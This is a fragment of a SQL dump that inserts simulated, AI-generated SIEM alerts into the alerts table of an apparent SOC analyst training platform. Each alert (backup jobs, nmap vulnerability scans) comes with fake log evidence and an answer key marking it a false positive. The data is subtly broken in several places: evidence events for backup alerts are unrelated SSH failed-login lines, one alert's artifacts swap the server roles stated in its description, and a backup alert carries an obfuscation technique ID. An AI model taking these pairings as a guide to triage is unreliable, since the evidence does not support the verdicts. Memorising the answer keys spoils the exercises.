ACC456\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.291Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.4.30\\\",\\\"dst_ip\\\":\\\"203.0.113.55\\\",\\\"username\\\":\\\"financeadmin\\\",\\\"hostname\\\":\\\"SWIFT-TRANS-01\\\",\\\"request_body\\\":\\\"TRANSFER 1000000 USD FROM ACC123 TO ACC456\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1782, 'Routine IT Vulnerability Scan Detected as Brute Force Attack', 'low', 'Splunk', 'A security alert was triggered by repeated login failures from an internal IP address. This activity was identified as a routine vulnerability scan by the IT department.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"192.168.1.20\",\"username\":\"admin\",\"hostname\":\"server01\",\"failed_attempts\":25}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for legitimate vulnerability scanning\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Commonly used administrative account\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address is part of the internal network and the activity aligns with scheduled security scans.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-16T03:04:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-16T03:03:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-16T03:02:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-16T03:01:28.289Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid 
user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.1.10\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"server01\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1783, 'Authorized Administrative Backup Misidentified as Data Exfiltration', 'low', 'Azure Sentinel', 'Data transfer activity from a sensitive database server to a backup server was flagged. This was verified as an authorized backup operation.', 'Data Exfil', 'T1020', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:45:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.6\",\"username\":\"backup_admin\",\"hostname\":\"backup01\",\"data_volume\":\"500GB\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal backup server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.6\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal database server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The data transfer was a scheduled backup task performed by the IT department.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.291Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T03:45:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.6\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"data_volume\\\":\\\"500GB\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1784, 'Routine IT Vulnerability Scan Detected', 'low', 'Splunk', 'A series of network connections from an internal IP address was detected, resembling a vulnerability scan. This activity is part of routine IT security checks.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.1\",\"username\":\"admin\",\"hostname\":\"scanner01\",\"command_line\":\"nmap -sS 192.168.1.1\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP used for routine scanning\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sS 192.168.1.1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a legitimate vulnerability scan command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Routine vulnerability scans are conducted by IT to ensure network security compliance.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated 
event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.292Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T10:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.100\\\",\\\"dst_ip\\\":\\\"192.168.1.1\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"scanner01\\\",\\\"command_line\\\":\\\"nmap -sS 192.168.1.1\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1785, 'Authorized Administrative Backup Activity Detected', 'low', 'Azure Sentinel', 'An administrative account performed a series of backup operations on critical servers. This is a scheduled, authorized activity.', 'Data Exfil', 'T1027', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.10\",\"username\":\"backup_admin\",\"hostname\":\"backup-server\",\"command_line\":\"backup --incremental --servers 10.0.0.10\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP performing authorized backup\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"backup --incremental --servers 10.0.0.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Recognized as a legitimate backup command\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The detected activity matches the pattern of scheduled backup operations by authorized personnel.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 
10.0.0.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 10.0.0.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 10.0.0.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 10.0.0.10\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.293Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T08:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.5\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup-server\\\",\\\"command_line\\\":\\\"backup --incremental --servers 10.0.0.10\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1786, 'Routine IT Vulnerability Scanning Detected', 'low', 'Splunk', 'A series of network scans were detected originating from an internal IT department system. The scans are part of routine vulnerability assessments scheduled by the IT team.', 'Network Scanning', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"192.168.1.100\",\"username\":\"it_admin\",\"hostname\":\"vulnscan01\",\"command_line\":\"nmap -A 192.168.1.100\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by IT department for scanning\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal target IP for routine scanning\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"nmap -A 192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Routine scanning command executed by IT department\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_scanning\",\"analysis_notes\":\"This alert was triggered by legitimate IT vulnerability scanning activity.\"}', 'Intermediate', 'SIEM', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.294Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T09:15:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"it_admin\\\",\\\"hostname\\\":\\\"vulnscan01\\\",\\\"command_line\\\":\\\"nmap -A 192.168.1.100\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1787, 'Authorized Backup Process Detected', 'low', 'Wazuh', 'An authorized backup process was detected on the server, initiated by a recognized administrative account. This aligns with scheduled backup operations.', 'Data Transfer', 'T1030', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.10\",\"dst_ip\":\"10.0.0.15\",\"username\":\"backup_admin\",\"hostname\":\"backup01\",\"command_line\":\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\"}', '2026-03-16 03:01:08', '2026-03-16 03:05:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP of the server initiating the backup\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal backup server IP\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Legitimate backup command executed by admin\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_transfer\",\"analysis_notes\":\"This alert corresponds to a scheduled backup process, which is normal and expected.\"}', 'Intermediate', 'SIEM', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-16T03:05:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"},{\"timestamp\":\"2026-03-16T03:04:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"},{\"timestamp\":\"2026-03-16T03:03:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"},{\"timestamp\":\"2026-03-16T03:02:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"},{\"timestamp\":\"2026-03-16T03:01:28.297Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-16T11:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.10\\\",\\\"dst_ip\\\":\\\"10.0.0.15\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"hostname\\\":\\\"backup01\\\",\\\"command_line\\\":\\\"rsync -avz /data/backup/ 10.0.0.15:/mnt/backup/\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
